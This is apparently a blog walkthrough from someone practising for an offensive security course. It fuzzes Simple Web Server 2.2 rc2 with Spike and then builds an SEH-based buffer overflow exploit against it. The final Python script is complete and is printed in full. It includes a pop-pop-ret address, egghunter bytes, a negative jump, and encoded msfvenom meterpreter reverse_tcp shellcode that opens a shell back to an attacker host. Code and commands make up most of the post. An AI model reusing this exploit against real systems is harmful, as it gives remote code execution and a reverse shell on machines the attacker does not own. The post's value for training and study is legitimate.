Close

Simple Web Server 2.2 Buffer Overflow (SEH)

Recently I have been working through the Offensive Security Cracking the Perimeter course.  To practice some of the concepts I decided to take a look at some known vulnerable applications.  My goal was to find a vulnerability and get RCE without looking at the known vulnerabilities or exploits.  This led me to Simple Web Server.

 

The Setup

Application: Simple Web Server 2.2 rc2 (Download from Exploit-DB)

Attacker: Kali Linux 2017.2 64-bit

Victim: Windows 7 Professional with SP1 32-bit

 

Fuzzing the Application

The first step is to find a crash by fuzzing the application.  We need to know what a legitimate request looks like so we will intercept one with Burp Suite then we will use Spike for fuzzing.

 

Capture a Sample Request

Below is a sample request, we need to replicate this in a Spike template.

GET / HTTP/1.1
Host: 10.10.100.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept-Language: en-US,en;q=0.8
Connection: close

 

Convert Request to a Spike Template

Here is the request in Spike format.

s_string("GET");
s_string(" ");
s_string("/");
s_string(" ");
s_string("HTTP/1.1");
s_string("\r\n");

s_string("Host:");
s_string(" ");
s_string("10.10.100.133");
s_string("\r\n");

s_string("User-Agent:");
s_string(" ");
s_string("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36");
s_string("\r\n");

s_string("Accept-Language:");
s_string(" ");
s_string("en-US,en;q=0.8");
s_string("\r\n");

s_string("Connection:");
s_string(" ");
s_string("close");
s_string("\r\n");

s_string("\r\n");

As it is, this template is missing some fuzz points.  So let’s pick some things to fuzz.  Let’s try fuzzing the HTTP option, the path of the GET request, and the connection field.  Our resulting Spike template should look like this.

s_string_variable("GET");
s_string(" ");
s_string_variable("/");
s_string(" ");
s_string("HTTP/1.1");
s_string("\r\n");

s_string("Host:");
s_string(" ");
s_string("10.10.100.133");
s_string("\r\n");

s_string("User-Agent:");
s_string(" ");
s_string("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36");
s_string("\r\n");

s_string("Accept-Language:");
s_string(" ");
s_string("en-US,en;q=0.8");
s_string("\r\n");

s_string("Connection:");
s_string(" ");
s_string_variable("close");
s_string("\r\n");

s_string("\r\n");

 

Fuzzing the Application

Now we need to let Spike fuzz the application so we can watch for a crash.  We load up Immunity Debugger, attach to the Simple Web Server executable, and kick off Spike with the following command.

generic_send_tcp 10.10.100.133 80 sws.spk 0 0

After a little trial and error hitting some INT3 breakpoints we find an SEH overwrite!

 

The crash seems to have a occurred in the Connection variable.  Let’s try to replicate the crash in Python.

Fuzzing Variable 2:14

 

Replicating the Crash with a Python Script

I like to use a template to save some time so some of the variables are just defined here for future use.  We will start with 5000 bytes and see if this script triggers the crash.

#!/usr/bin/python

####################################################################
# Application: Simple Web Server 2.2rc2                            #
# Author: VOSEC                                                    #
# Website: https://veilofsecurity.com                              #
# Tested OS: Windows 7 SP1 32bit                                   #
####################################################################

import socket
import sys

ip = "10.10.100.133"
port = 80

junk = "A"*4992
jmp = "B"*4
retn = "C"*4
shellcode = ""

req = "GET / HTTP/1.1\r\n"
req += "Host: 10.10.100.133\r\n"
req += "Connection:" + junk + jmp + retn + shellcode + "\r\n"
req += "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(req)
s.close()

 

Success the script worked and we have the same SEH overwrite.

 

Exploiting the Vulnerability

Now to find the offset overwriting the SEH address.

 

Finding the Offset for the Return Address

We need to modify our Python script to use a unique pattern to identify the offset.  We will use pattern_create from Metasploit.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4992

We insert the pattern into our Python script and trigger the crash again.

junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3"
jmp = "B"*4
retn = "C"*4
shellcode = ""

 

After triggering the crash again we can use a mona module to locate the offset.

!mona findmsp

nSEH-Offset

 

Now to find a pop-pop-ret address we can use.

 

Finding a Return Address

To find a pop-pop-ret we will use the following mona command.

!mona seh

Perfect, we find several usable return addresses.  We will use 0x6aac10b4.

 

Let’s add our newly discovered information to our exploit.

junk = "A"*2280           #offset from !mona findmsp
jmp = "B"*4               #nSEH
retn = "\xb4\x10\xac\x6a" #SEH - 0x6aac10b4 from !mona seh
shellcode = "C"*2000      #this will let us see if we can jmp forward

 

We are now able to trigger the crash and follow it to the beginning of our 4 B’s.  By following the crash you can see a jmp forward is not going to provide enough space for reverse shell shellcode so we will need to use a 2 byte negative jmp.  Before we add the jmp instruction, let’s create some egghunter shellcode to use and add it to our script.

 

Adding Egghunter Shellcode

We can create the egghunter shellcode using another mona command.

!mona egg -t W00T

We then fix our script to include the new egg and egghunter.

 

junk = "A"*2240              #offset from !mona findmsp
egg = "W00TW00T"             #the egg our egghunter is looking for
shellcode = ""               #placeholder for later
#egghunter code is 32bytes
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
jmp = "\xeb\xde\x90\x90"     #nSEH - jmp -34
retn = "\xb4\x10\xac\x6a"    #SEH - 0x6aac10b4 from !mona seh

req = "GET / HTTP/1.1\r\n"
req += "Host: 10.10.100.133\r\n"
req += "Connection:" + junk + egg + shellcode + egghunter + jmp + retn + "\r\n"
req += "\r\n"

 

Testing our script results in a crash and the egghunter successfully finds our egg.  Now we can add our shellcode.

 

Getting a Reverse Shell

The final step, we need to generate some shellcode and add it to our exploit.  We will use msfvenom to generate a meterpreter payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.100.103 LPORT=4444 exitfunc=seh -e x86/alpha_mixed -f python

Msfvenom gives a fairly large shellcode (734 bytes) but we have the room and we avoid bad characters by using the alpha_mixed encoder.  Our final script looks like the following.

#!/usr/bin/python

####################################################################
# Application: Simple Web Server 2.2rc2 #
# Author: VOSEC #
# Website: https://veilofsecurity.com #
# Tested OS: Windows 7 SP1 32bit #
####################################################################

import socket
import sys

ip = "10.10.100.133"
port = 80

junk = "A"*1506            #offset from !mona findmsp
egg = "W00TW00T"           #the egg our egghunter is looking for
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.100.103 LPORT=4444 exitfunc=seh -e x86/alpha_mixed -f python
#shellcode is 734 bytes
shellcode = ""
shellcode += "\x89\xe1\xdb\xc6\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x39\x78\x4d"
shellcode += "\x52\x77\x70\x75\x50\x45\x50\x55\x30\x4b\x39\x6a\x45"
shellcode += "\x74\x71\x69\x50\x71\x74\x4e\x6b\x32\x70\x50\x30\x6e"
shellcode += "\x6b\x46\x32\x44\x4c\x4c\x4b\x61\x42\x44\x54\x4e\x6b"
shellcode += "\x42\x52\x66\x48\x46\x6f\x6c\x77\x63\x7a\x64\x66\x35"
shellcode += "\x61\x69\x6f\x6e\x4c\x67\x4c\x33\x51\x71\x6c\x35\x52"
shellcode += "\x66\x4c\x57\x50\x6b\x71\x68\x4f\x74\x4d\x35\x51\x58"
shellcode += "\x47\x6b\x52\x79\x62\x56\x32\x51\x47\x4e\x6b\x66\x32"
shellcode += "\x54\x50\x4c\x4b\x30\x4a\x55\x6c\x6e\x6b\x42\x6c\x36"
shellcode += "\x71\x52\x58\x79\x73\x61\x58\x46\x61\x68\x51\x62\x71"
shellcode += "\x4c\x4b\x51\x49\x75\x70\x37\x71\x78\x53\x4e\x6b\x31"
shellcode += "\x59\x75\x48\x6b\x53\x35\x6a\x72\x69\x4e\x6b\x44\x74"
shellcode += "\x4e\x6b\x53\x31\x39\x46\x75\x61\x6b\x4f\x4c\x6c\x7a"
shellcode += "\x61\x78\x4f\x54\x4d\x76\x61\x7a\x67\x54\x78\x79\x70"
shellcode += "\x54\x35\x48\x76\x46\x63\x73\x4d\x38\x78\x45\x6b\x33"
shellcode += "\x4d\x47\x54\x33\x45\x4d\x34\x31\x48\x6c\x4b\x61\x48"
shellcode += "\x35\x74\x46\x61\x68\x53\x42\x46\x4e\x6b\x74\x4c\x32"
shellcode += "\x6b\x4e\x6b\x71\x48\x77\x6c\x56\x61\x59\x43\x4c\x4b"
shellcode += "\x47\x74\x6e\x6b\x77\x71\x6e\x30\x4c\x49\x33\x74\x66"
shellcode += "\x44\x57\x54\x31\x4b\x33\x6b\x51\x71\x43\x69\x32\x7a"
shellcode += "\x42\x71\x49\x6f\x59\x70\x51\x4f\x53\x6f\x70\x5a\x4c"
shellcode += "\x4b\x34\x52\x4a\x4b\x6e\x6d\x43\x6d\x72\x48\x77\x43"
shellcode += "\x50\x32\x63\x30\x65\x50\x62\x48\x71\x67\x71\x63\x36"
shellcode += "\x52\x31\x4f\x62\x74\x33\x58\x62\x6c\x61\x67\x51\x36"
shellcode += "\x46\x67\x6b\x4f\x4a\x75\x4e\x58\x6a\x30\x43\x31\x47"
shellcode += "\x70\x37\x70\x45\x79\x78\x44\x36\x34\x70\x50\x50\x68"
shellcode += "\x45\x79\x6b\x30\x52\x4b\x75\x50\x49\x6f\x6e\x35\x50"
shellcode += "\x6a\x46\x6a\x71\x78\x66\x6a\x57\x7a\x35\x34\x52\x47"
shellcode += "\x31\x78\x47\x72\x35\x50\x37\x61\x33\x6c\x4e\x69\x68"
shellcode += "\x66\x30\x50\x36\x30\x32\x70\x56\x30\x71\x50\x42\x70"
shellcode += "\x37\x30\x30\x50\x72\x48\x58\x6a\x66\x6f\x79\x4f\x59"
shellcode += "\x70\x59\x6f\x38\x55\x6d\x47\x42\x4a\x54\x50\x71\x46"
shellcode += "\x72\x77\x33\x58\x7a\x39\x39\x35\x30\x74\x43\x51\x4b"
shellcode += "\x4f\x69\x45\x6e\x65\x39\x50\x54\x34\x47\x7a\x49\x6f"
shellcode += "\x50\x4e\x34\x48\x62\x55\x48\x6c\x59\x78\x61\x71\x73"
shellcode += "\x30\x35\x50\x67\x70\x51\x7a\x75\x50\x71\x7a\x44\x44"
shellcode += "\x63\x66\x42\x77\x70\x68\x73\x32\x78\x59\x59\x58\x63"
shellcode += "\x6f\x39\x6f\x59\x45\x4f\x73\x6b\x48\x55\x50\x63\x4e"
shellcode += "\x74\x76\x6c\x4b\x70\x36\x32\x4a\x67\x30\x30\x68\x75"
shellcode += "\x50\x34\x50\x65\x50\x37\x70\x61\x46\x42\x4a\x77\x70"
shellcode += "\x70\x68\x32\x78\x6e\x44\x71\x43\x69\x75\x4b\x4f\x59"
shellcode += "\x45\x7a\x33\x30\x53\x51\x7a\x53\x30\x50\x56\x33\x63"
shellcode += "\x61\x47\x30\x68\x56\x62\x49\x49\x7a\x68\x43\x6f\x49"
shellcode += "\x6f\x59\x45\x4c\x43\x58\x78\x35\x50\x63\x4d\x37\x52"
shellcode += "\x33\x68\x55\x38\x65\x50\x77\x30\x43\x30\x45\x50\x31"
shellcode += "\x7a\x57\x70\x76\x30\x73\x58\x64\x4b\x76\x4f\x74\x4f"
shellcode += "\x54\x70\x39\x6f\x4a\x75\x33\x67\x63\x58\x53\x45\x62"
shellcode += "\x4e\x72\x6d\x65\x31\x6b\x4f\x6b\x65\x61\x4e\x53\x6e"
shellcode += "\x49\x6f\x46\x6c\x64\x64\x39\x79\x31\x61\x4b\x4f\x79"
shellcode += "\x6f\x59\x6f\x67\x71\x48\x43\x46\x49\x6a\x66\x63\x45"
shellcode += "\x49\x57\x48\x43\x4d\x6b\x59\x6e\x66\x6e\x36\x52\x78"
shellcode += "\x6a\x52\x4a\x55\x50\x42\x73\x59\x6f\x4e\x35\x70\x6a"
shellcode += "\x35\x50\x5a\x63\x41\x41"
#egghunter code is 32bytes
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
jmp = "\xeb\xde\x90\x90"         #nSEH - jmp -34
retn = "\xb4\x10\xac\x6a"        #SEH - 0x6aac10b4 from !mona seh

req = "GET / HTTP/1.1\r\n"
req += "Host: 10.10.100.133\r\n"
req += "Connection:" + junk + egg + shellcode + egghunter + jmp + retn + "\r\n"
req += "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(req)
s.close()

 

And we have a shell!

Reverse-shell

 

Leave a Reply

Your email address will not be published. Required fields are marked *